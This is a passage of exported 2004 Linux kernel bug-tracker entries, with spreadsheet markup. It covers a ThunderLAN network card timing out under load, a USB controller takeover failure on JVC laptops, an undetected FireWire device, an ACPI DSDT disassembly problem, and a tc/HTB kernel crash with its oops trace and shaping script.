followed by /etc/init.d/networking restart. Kernel ring buffer: suklaamonni:/var/log# dmesg -s 200000 e31 AWRD 0x00000000) @ 0x1fff3000 ACPI: FADT (v001 VIA694 AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x1fff3040 ACPI: DSDT (v001 VIA694 AWRDACPI 0x00001000 MSFT 0x0100000c) @ 0x00000000 ACPI: PM-Timer IO Port: 0x4008 Built 1 zonelists Kernel command line: root=/dev/hda1 ro Local APIC disabled by BIOS -- reenabling. Found and enabled local APIC! Initializing CPU#0 PID hash table entries: 2048 (order 11: 16384 bytes) Detected 1604.172 MHz processor. Using pmtmr for high-res timesource Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 511428k/524224k available (1527k kernel code, 12040k reserved, 694k data, 148k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay loop... 3178.49 BogoMIPS Security Scaffold v1.0.0 initialized Mount-cache hash table entries: 512 (order: 0, 4096 bytes) CPU: After generic identify, caps: 0383fbff c1cbfbff 00000000 00000000 CPU: After vendor identify, caps: 0383fbff c1cbfbff 00000000 00000000 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 256K (64 bytes/line) CPU: After all inits, caps: 0383fbff c1cbfbff 00000000 00000020 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: AMD Athlon(tm) XP 1900+ stepping 02 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 1603.0267 MHz. ..... host bus clock speed is 267.0211 MHz. checking if image is initramfs...it isn't (ungzip failed); looks like an initrd Freeing initrd memory: 4488k freed NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfb470, last bus=1 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20040326 ACPI: IRQ9 SCI: Level Trigger. spurious 8259A interrupt: IRQ7. ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 1 3 4 5 6 7 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKC] (IRQs 1 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) Linux Plug and Play Support v0.97 (c) Adam Belay PnPBIOS: Scanning system for PnP BIOS support... PnPBIOS: Found PnP BIOS installation structure at 0xc00fbf20 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xbf50, dseg 0xf0000 pnp: 00:0b: ioport range 0x3f0-0x3f1 has been reserved PnPBIOS: 16 nodes reported by PnP BIOS; 16 recorded by driver PCI: Using ACPI for IRQ routing ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10 ACPI: PCI interrupt 0000:00:0a.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 ACPI: PCI interrupt 0000:00:0c.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 ACPI: PCI interrupt 0000:00:11.1[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11 ACPI: PCI interrupt 0000:00:11.2[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:11.3[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:11.4[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:01:00.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) devfs: 2004-01-31 Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x0 Initializing Cryptographic API isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Serial: 8250/16550 driver $Revision: 1.90 $ 48 ports, IRQ sharing enabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 input: AT Translated Set 2 keyboard on isa0060/serio0 NET: Registered protocol family 2 IP: routing cache hash table of 4096 buckets, 32Kbytes TCP: Hash tables configured (established 32768 bind 65536) NET: Registered protocol family 8 NET: Registered protocol family 20 ACPI: (supports S0 S1 S4 S5) RAMDISK: cramfs filesystem found at block 0 RAMDISK: Loading 4488 blocks [1 disk] into ram disk... done. VFS: Mounted root (cramfs filesystem) readonly. Freeing unused kernel memory: 148k freed vesafb: probe of vesafb0 failed with error -6 NET: Registered protocol family 1 SCSI subsystem initialized libata version 1.02 loaded. Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: IDE controller at PCI slot 0000:00:11.1 ACPI: PCI interrupt 0000:00:11.1[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 VP_IDE: chipset revision 6 VP_IDE: not 100% native mode: will probe irqs later VP_IDE: VIA vt8233 (rev 00) IDE UDMA100 controller on pci0000:00:11.1 ide0: BM-DMA at 0xdc00-0xdc07, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xdc08-0xdc0f, BIOS settings: hdc:DMA, hdd:pio hda: Maxtor 6E020L0, ATA DISK drive Using anticipatory io scheduler ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hda: max request size: 128KiB hda: 40718160 sectors (20847 MB) w/2048KiB Cache, CHS=40395/16/63, UDMA(100) /dev/ide/host0/bus0/target0/lun0: p1 p2 &lt; p5 &gt; hdc: PLEXTOR CD-R PX-W1210A, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. Adding 497972k swap on /dev/hda5. Priority:-1 extents:1 EXT3 FS on hda1, internal journal Real Time Clock Driver v1.12 hdc: ATAPI 32X CD-ROM CD-R/RW drive, 2048kB Cache, DMA Uniform CD-ROM driver Revision: 3.20 Capability LSM initialized irda_init() NET: Registered protocol family 23 ThunderLAN driver v1.15 ACPI: PCI interrupt 0000:00:0a.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 TLAN: eth0 irq=10, io=d000, Compaq Netelligent 10/100 TX PCI UTP, Rev. 16 TLAN: 1 device installed, PCI: 1 EISA: 0 Creative EMU10K1 PCI Audio Driver, version 0.20a, 03:46:06 Aug 16 2004 ACPI: PCI interrupt 0000:00:0c.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 emu10k1: EMU10K1 rev 5 model 0x8040 found, IO at 0xd400-0xd41f, IRQ 10 ac97_codec: AC97 codec, id: TRA35 (TriTech TR A5) input: PC Speaker inserting floppy driver for 2.6.8-1-k7 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 parport: PnPBIOS parport detected. parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE,EPP] Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected VIA KT266/KY266x/KT333 chipset agpgart: Maximum main memory to use for agp memory: 439M agpgart: AGP aperture is 128M @ 0xd0000000 cpci_hotplug: CompactPCI Hot Plug Core version: 0.2 pci_hotplug: PCI Hot Plug PCI Core version: 0.5 pciehp: acpi_pciehprm:\_SB_.PCI0 evaluate _BBN fail=0x5 pciehp: acpi_pciehprm:get_device PCI ROOT HID fail=0x5 shpchp: acpi_shpchprm:\_SB_.PCI0 evaluate _BBN fail=0x5 shpchp: acpi_shpchprm:get_device PCI ROOT HID fail=0x5 gameport: pci0000:00:0c.1 speed 1193 kHz usbcore: registered new driver usbfs usbcore: registered new driver hub USB Universal Host Controller Interface driver v2.2 ACPI: PCI interrupt 0000:00:11.2[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 uhci_hcd 0000:00:11.2: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller uhci_hcd 0000:00:11.2: irq 11, io base 0000e000 uhci_hcd 0000:00:11.2: new USB bus registered, assigned bus number 1 hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected ACPI: PCI interrupt 0000:00:11.3[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 uhci_hcd 0000:00:11.3: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (#2) uhci_hcd 0000:00:11.3: irq 11, io base 0000e400 uhci_hcd 0000:00:11.3: new USB bus registered, assigned bus number 2 hub 2-0:1.0: USB hub found hub 2-0:1.0: 2 ports detected ACPI: PCI interrupt 0000:00:11.4[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 uhci_hcd 0000:00:11.4: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (#3) uhci_hcd 0000:00:11.4: irq 11, io base 0000e800 uhci_hcd 0000:00:11.4: new USB bus registered, assigned bus number 3 hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected usb 1-1: new low speed USB device using address 2 usbcore: registered new driver hiddev usb 2-2: new low speed USB device using address 2 hiddev96: USB HID v1.00 Device [American Power Conversion Back-UPS ES/CyberFort 500 FW: 4.1.I U] on usb-0000:00:11.2-1 usbcore: registered new driver usbhid drivers/usb/input/hid-core.c: v2.0:USB HID core driver input: USB HID v1.10 Mouse [Logitech USB Receiver] on usb-0000:00:11.3-2 mice: PS/2 mouse device common for all mice ts: Compaq touchscreen protocol output TLAN: eth0: Starting autonegotiation. NET: Registered protocol family 17 TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; NET: Registered protocol family 10 Disabled Privacy Extensions on device c02f8de0(lo) IPv6 over IPv4 tunneling driver apm: BIOS version 1.2 Flags 0x07 (Driver version 1.16ac) apm: overridden by ACPI. nvidia: module license 'NVIDIA' taints kernel. ACPI: PCI interrupt 0000:01:00.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 NVRM: loading NVIDIA Linux x86 NVIDIA Kernel Module 1.0-6111 Tue Jul 27 07:55: 38 PDT 2004 agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V2 device at 0000:00:00.0 into 4x mode agpgart: Putting AGP V2 device at 0000:01:00.0 into 4x mode agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V2 device at 0000:00:00.0 into 4x mode agpgart: Putting AGP V2 device at 0000:01:00.0 into 4x mode eth0: no IPv6 routers present SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) TLAN: Received interrupt for uncompleted RX frame. NETDEV WATCHDOG: eth0: transmit timed out TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; NETDEV WATCHDOG: eth0: transmit timed out TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; ThunderLAN driver v1.15 ACPI: PCI interrupt 0000:00:0a.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 TLAN: eth0 irq=10, io=d000, Compaq Netelligent 10/100 TX PCI UTP, Rev. 16 TLAN: 1 device installed, PCI: 1 EISA: 0 TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; eth0: no IPv6 routers present smb_add_request: request [c578fec0, mid=39] timed out! smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_add_request: request [c578fec0, mid=39] timed out! smb_proc_readdir_long: error=-13, breaking smb_add_request: request [c578fec0, mid=47] timed out! SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_add_request: request [c578fec0, mid=1535] timed out! smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-13, breaking smb_proc_readdir_long: error=-512, breaking TLAN: Received interrupt for uncompleted RX frame. smb_add_request: request [c578f1c0, mid=329] timed out! smb_add_request: request [c578f1c0, mid=329] timed out! NETDEV WATCHDOG: eth0: transmit timed out TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; smb_add_request: request [c578f1c0, mid=337] timed out! smb_add_request: request [c578f1c0, mid=1825] timed out! ThunderLAN driver v1.15 ACPI: PCI interrupt 0000:00:0a.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 TLAN: eth0 irq=10, io=d000, Compaq Netelligent 10/100 TX PCI UTP, Rev. 16 TLAN: 1 device installed, PCI: 1 EISA: 0 smb_add_request: request [c578f1c0, mid=380] timed out! smb_add_request: request [c578f1c0, mid=398] timed out! TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; eth0: no IPv6 routers present smb_add_request: request [c578f1c0, mid=219] timed out! SMB connection re-established (-5) smb_add_request: request [c578f1c0, mid=439] timed out! smb_add_request: request [c578fcc0, mid=330] timed out! SMB connection re-established (-5) smb_add_request: request [c578f1c0, mid=242] timed out! smb_add_request: request [c578fcc0, mid=338] timed out! SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) smb_add_request: request [c578f1c0, mid=217] timed out! SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) SMB connection re-established (-5) TLAN: Received interrupt for uncompleted RX frame. NETDEV WATCHDOG: eth0: transmit timed out TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; NETDEV WATCHDOG: eth0: transmit timed out TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; ThunderLAN driver v1.15 ACPI: PCI interrupt 0000:00:0a.0[A] -&gt; GSI 10 (level, low) -&gt; IRQ 10 TLAN: eth0 irq=10, io=d000, Compaq Netelligent 10/100 TX PCI UTP, Rev. 16 TLAN: 1 device installed, PCI: 1 EISA: 0 TLAN: eth0: Starting autonegotiation. TLAN: eth0: Autonegotiation complete. TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full-Duplex TLAN: Partner capability: 10BaseT-HD 10BaseT-FD 100baseTx-HD 100baseTx-FD&lt;NULL&gt; eth0: no IPv6 routers present Steps to reproduce: Don't know, because it just happens under a heavy network load. I've found another fellow that has the same problem: http://lists.debian.org/debian-user/2004/08/msg01139.html</t>
  </si>
  <si>
    <t>USB HC TakeOver failed! on JVC MP-XP72[35]0 laptops</t>
  </si>
  <si>
    <t>2.6.7-2.6.8</t>
  </si>
  <si>
    <t>2004-08-29 06:59 UTC</t>
  </si>
  <si>
    <t>2004-11-10 16:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: JVC MP-XP7230FR Software Environment: kernel Problem Description: During the boot, I see the following messages: Jul 28 07:33:37 yakkuru kernel: ehci_hcd 0000:00:0f.2: NEC Corporation USB 2.0 Jul 28 07:33:37 yakkuru kernel: ehci_hcd 0000:00:0f.2: irq 5, pci mem d087c000 Jul 28 07:33:37 yakkuru kernel: ehci_hcd 0000:00:0f.2: new USB bus registered, assigned bus number 1 Jul 28 07:33:37 yakkuru kernel: ehci_hcd 0000:00:0f.2: USB 2.0 enabled, EHCI 1.00, driver 2004-May-10 Jul 28 07:33:37 yakkuru kernel: hub 1-0:1.0: USB hub found Jul 28 07:33:37 yakkuru kernel: hub 1-0:1.0: 3 ports detected Jul 28 07:33:37 yakkuru kernel: ohci_hcd: 2004 Feb 02 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) Jul 28 07:33:37 yakkuru kernel: ohci_hcd: block sizes: ed 64 td 64 Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.0: NEC Corporation USB Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.0: USB HC TakeOver failed! Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.0: can't reset Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.0: init 0000:00:0f.0 fail, -1 Jul 28 07:33:37 yakkuru kernel: ohci_hcd: probe of 0000:00:0f.0 failed with error -1 Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.1: NEC Corporation USB (#2) Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.1: USB HC TakeOver failed! Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.1: can't reset Jul 28 07:33:37 yakkuru kernel: ohci_hcd 0000:00:0f.1: init 0000:00:0f.1 fail, -1 Jul 28 07:33:37 yakkuru kernel: ohci_hcd: probe of 0000:00:0f.1 failed with error -1 After that, USB hotplug does not work at all for USB 1.1 devices. (I have not tested USB 2 devices). Plugging a device seems to go undetected bu the kernel. I'm still able to mount a USB 1.1 storage device if it is plugged-in at boot time. Steps to reproduce: Booting on a JVC MP-XP7230 ou MP-XP7250 laptop :) I was able to find the following patch on the web that fixes this issue for me: http://people.freenet.de/umaxx/howto_linux-on-jvc_mp-xp7250de.txt I'm now using a 2.6.8 kernel with this patch applied, and USB is working nicely.</t>
  </si>
  <si>
    <t>Firewire400 device not detected</t>
  </si>
  <si>
    <t>2004-08-29 11:17 UTC</t>
  </si>
  <si>
    <t>Chris Horn</t>
  </si>
  <si>
    <t>2005-11-10 11:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: select output of 'lspci -v': 0000:00:07.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 808a Flags: bus master, medium devsel, latency 64, IRQ 11 Memory at f7600000 (32-bit, non-prefetchable) [size=2K] I/O ports at cc00 [size=128] Capabilities: [50] Power Management version 2 from 'dmesg': ohci1394: $Rev: 1203 $ Ben Collins &lt;bcollins@debian.org&gt; ohci1394: fw-host0: OHCI-1394 1.0 (PCI): IRQ=[11] MMIO=[f7600000-f76007ff] Max Packet=[2048] video1394: Installed video1394 module ieee1394: raw1394: /dev/raw1394 device initialized sbp2: $Rev: 1205 $ Ben Collins &lt;bcollins@debian.org&gt; Software Environment: Linux snozberry 2.6.6 #1 Sat Jun 5 11:34:57 EDT 2004 i686 GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.14.90.0.7 util-linux 2.12 mount 2.12 module-init-tools 3.1-pre5 e2fsprogs 1.35 PPP 2.4.2 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Modules Loaded snd_ens1370 snd_rawmidi snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc snd_ak4531_codec snd nvidia ftdi_sio Problem Description: I've got a Oxford 922 based device (FireWire 800/400 + USB 2.0/1.1; http://eshop.macsales.com/Catalog_Item.cfm?ID=5775&amp;Item=OWCMEFW800) that works fine under OS X, but does not trigger nary a log message when plugged in to my 2.6.6 Asus SK8V based Opteron system. I'm plugging it into the motherboard's firewire 400 port. I've tried plugging in at least four other firewire storage devices (that have since been returned because I thought they were defective), none of which seem to do anything when plugged into the Linux machine. I've even tried plugging in my iPod. There are never any messages printed to any log file. Judging by my searches on the web, I believe my Via chipset is a supported Firewire controller.</t>
  </si>
  <si>
    <t>iasl cannot -dc compiled dsdt</t>
  </si>
  <si>
    <t>2004-08-30 20:39 UTC</t>
  </si>
  <si>
    <t>Ois</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10.1 Hardware Environment: Acer Aspire 1705SMi Software Environment: Problem Description: My (presumably) fixed dsdt.dsl compiles successfully under iasl (20040715), but when iasl -dc is run on the resulting AML, "Z00C, Z00C" in a package turns into "Z00C (), Z00C ()" and won't recompile. So I don't know if my AML is valid... maybe not a bug. Steps to reproduce: Download http://www.esatclear.ie/~destynova/dsdt.dsl iasl -tc dsdt.dsl iasl -dc DSDT.aml scratch head</t>
  </si>
  <si>
    <t>TC crashes my Kernel 2.6.8.1, but do not crash my kernel 2.6.7!!!</t>
  </si>
  <si>
    <t>2004-08-31 06:41 UTC</t>
  </si>
  <si>
    <t>Adryan Ban</t>
  </si>
  <si>
    <t>2005-02-17 13:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10 &amp; Debian 3 r2 Hardware Environment: AMD K7 Duron 900Mhz or AMD K7 XP 1500+ Software Environment: iproute2-2.4.7-now-ss020116-try.tar.bz2 iproute2-2.6.8-040823.tar.gz iproute2-2.6.9-jamal.tgz Problem Description: when i try to asign classes and u32 filter with htb with tc, my kernel crashes. It gives my this messege: Aug 31 11:43:45 localhost kernel: c0260150 Aug 31 11:43:45 localhost kernel: PREEMPT Aug 31 11:43:45 localhost kernel: Modules linked in: sch_htb nfsd exportfs lockd sunrpc md5 ipv6 snd_via82xx snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd _mpu401_uart snd_rawmidi snd soundcore ip_gre ide_cd cdrom 8139too ne2k_pci 8390 crc32 nls_iso8859_1 nls_cp850 vfat fat supermount md via_agp uhci_hcd usbcore r eiserfs Aug 31 11:43:45 localhost kernel: CPU: 0 Aug 31 11:43:45 localhost kernel: EIP: 0060:[gen_new_kid+32/80] Not tainte d Aug 31 11:43:45 localhost kernel: EIP: 0060:[&lt;c0260150&gt;] Not tainted Aug 31 11:43:45 localhost kernel: EFLAGS: 00010206 (2.6.8.1) Aug 31 11:43:45 localhost kernel: eax: 00000803 ebx: 80000000 ecx: 00000803 edx: 000003e8 Aug 31 11:43:45 localhost kernel: esi: c6769e60 edi: 00000000 ebp: c6769c40 esp: c586dbb4 Aug 31 11:43:45 localhost kernel: ds: 007b es: 007b ss: 0068 Aug 31 11:43:45 localhost kernel: Process tc (pid: 7034, threadinfo=c586c000 tas k=c847ec90) Aug 31 11:43:45 localhost kernel: Stack: c65f9520 c02606b6 c6769c40 80000000 c9c 1b830 0000003c 00000001 00000001 Aug 31 11:43:45 localhost kernel: 00000013 00000013 00000013 c9c1b830 000 00000 00000000 00000000 c9c1b838 Aug 31 11:43:45 localhost kernel: 00000000 00000000 00000000 00000000 000 01000 c98e4aa4 00000000 c65f9520 Aug 31 11:43:45 localhost kernel: Call Trace: Aug 31 11:43:45 localhost kernel: [u32_change+598/1104] Aug 31 11:43:45 localhost kernel: [&lt;c02606b6&gt;] Aug 31 11:43:45 localhost kernel: [tc_ctl_tfilter+957/1552] Aug 31 11:43:45 localhost kernel: [&lt;c025c0bd&gt;] Aug 31 11:43:45 localhost kernel: [rtnetlink_rcv+808/912] Aug 31 11:43:45 localhost kernel: [&lt;c0254f18&gt;] Aug 31 11:43:45 localhost kernel: [netlink_dump+177/560] Aug 31 11:43:45 localhost kernel: [&lt;c0266cc1&gt;] Aug 31 11:43:45 localhost kernel: [netlink_data_ready+90/112] Aug 31 11:43:45 localhost kernel: [&lt;c0266afa&gt;] Aug 31 11:43:45 localhost kernel: [netlink_sendskb+140/192] Aug 31 11:43:45 localhost kernel: [&lt;c026610c&gt;] Aug 31 11:43:45 localhost kernel: [netlink_sendmsg+534/768] Aug 31 11:43:45 localhost kernel: [&lt;c0266786&gt;] Aug 31 11:43:45 localhost kernel: [sock_sendmsg+183/272] Aug 31 11:43:45 localhost kernel: [&lt;c0243277&gt;] Aug 31 11:43:45 localhost kernel: [sock_sendmsg+183/272] Aug 31 11:43:45 localhost kernel: [&lt;c0243277&gt;] Aug 31 11:43:45 localhost kernel: [verify_iovec+60/160] Aug 31 11:43:45 localhost kernel: [&lt;c024945c&gt;] Aug 31 11:43:45 localhost kernel: [sys_sendmsg+415/576] Aug 31 11:43:45 localhost kernel: [&lt;c0244f5f&gt;] Aug 31 11:43:45 localhost kernel: [do_no_page+111/880] Aug 31 11:43:45 localhost kernel: [&lt;c0145dcf&gt;] Aug 31 11:43:45 localhost kernel: [handle_mm_fault+360/512] Aug 31 11:43:45 localhost kernel: [&lt;c0146368&gt;] Aug 31 11:43:45 localhost kernel: [do_page_fault+425/1471] Aug 31 11:43:45 localhost kernel: [&lt;c0116e39&gt;] Aug 31 11:43:45 localhost kernel: [update_process_times+70/96] Aug 31 11:43:45 localhost kernel: [&lt;c0123f76&gt;] Aug 31 11:43:45 localhost kernel: [update_wall_time+11/64] Aug 31 11:43:45 localhost kernel: [&lt;c0123ddb&gt;] Aug 31 11:43:45 localhost kernel: [rcu_check_quiescent_state+117/144] Aug 31 11:43:45 localhost kernel: [&lt;c012bc65&gt;] Aug 31 11:43:45 localhost kernel: [copy_from_user+66/112] Aug 31 11:43:45 localhost kernel: [&lt;c01aec32&gt;] Aug 31 11:43:45 localhost kernel: [sys_socketcall+137/608] Aug 31 11:43:45 localhost kernel: [&lt;c02452b9&gt;] Aug 31 11:43:45 localhost kernel: [sysenter_past_esp+82/113] Aug 31 11:43:45 localhost kernel: [&lt;c0106159&gt;] Aug 31 11:43:45 localhost kernel: Code: 8b 42 04 8b 12 25 ff 0f 00 00 39 c1 0f 4 2 c8 85 d2 75 ed 41 Steps to reproduce: This is a part of my script that i use to create the traffic shapping: #!/bin/sh echo -en "\033[1;39m" DEV=eth2 TC="/usr/sbin/tc" #TC="/home/Kitts/iproute2/iproute2/tc/tc" U32="$TC filter add dev $DEV protocol ip parent 1:0 prio 1 u32" echo echo -e "HTB Script-create \033[1;35mV3.0\033[1;39m for\033[1;32m outgoing\033[1;39m trafic on device\033[1;34m $DEV\033[1;39m" echo "Del prev root" $TC qdisc del dev $DEV root echo "Add new root class - handle 1:" $TC qdisc add dev $DEV root handle 1: htb default 15 echo "|-Add LAN band (this is o root class!) - classid 1:1, parent 1:" $TC class add dev $DEV parent 1: classid 1:1 htb rate 100Mbit ceil 100Mbit burst 32k quantum 1536 $TC class add dev $DEV parent 1:1 classid 1:0x20 htb rate 24Mbit ceil 100Mbit burst 32k quantum 1536 echo -e "| |-Add FROM\033[1;32m LAN 80.97.163.0/28\033[1;39m TO\033[1;32m other LANs\033[1;39m class band - classid 1:0x20, parent 1:1" $U32 match ip src 80.97.163.0/28 match ip dst 80.97.163.0/28 flowid 1:0x20 $U32 match ip src 80.97.163.0/28 match ip dst 192.168.0.0/24 flowid 1:0x20 $U32 match ip src 80.97.163.0/28 match ip dst 172.16.0.0/28 flowid 1:0x20 $U32 match ip src 80.97.163.0/28 match ip dst 172.16.1.0/24 flowid 1:0x20 $U32 match ip src 80.97.163.0/28 match ip dst 192.168.1.0/24 flowid 1:0x20 $U32 match ip src 80.97.163.0/28 match ip dst 255.255.255.255/32 flowid 1:0x20 $TC qdisc add dev $DEV parent 1:0x20 handle 0x20: pfifo $TC class add dev $DEV parent 1:1 classid 1:0x21 htb rate 24Mbit ceil 100Mbit burst 32k quantum 1536 echo -e "| |-Add FROM\033[1;32m LAN 192.168.0.0/24\033[1;39m TO\033[1;32m other LANs\033[1;39m class band - classid 1:0x21, parent 1:1" $U32 match ip src 192.168.0.0/24 match ip dst 192.168.0.0/24 flowid 1:0x21 $U32 match ip src 192.168.0.0/24 match ip dst 192.168.1.0/24 flowid 1:0x21 $U32 match ip src 192.168.0.0/24 match ip dst 80.97.163.0/28 flowid 1:0x21 $U32 match ip src 192.168.0.0/24 match ip dst 172.16.0.0/28 flowid 1:0x21 $U32 match ip src 192.168.0.0/24 match ip dst 172.16.1.0/24 flowid 1:0x21 $U32 match ip src 192.168.0.0/24 match ip dst 255.255.255.255/32 flowid 1:0x21 $TC qdisc add dev $DEV parent 1:0x21 handle 0x21: pfifo $TC class add dev $DEV parent 1:1 classid 1:0x22 htb rate 24Mbit ceil 100Mbit burst 32k quantum 1536 echo -e "| |-Add FROM\033[1;32m LAN 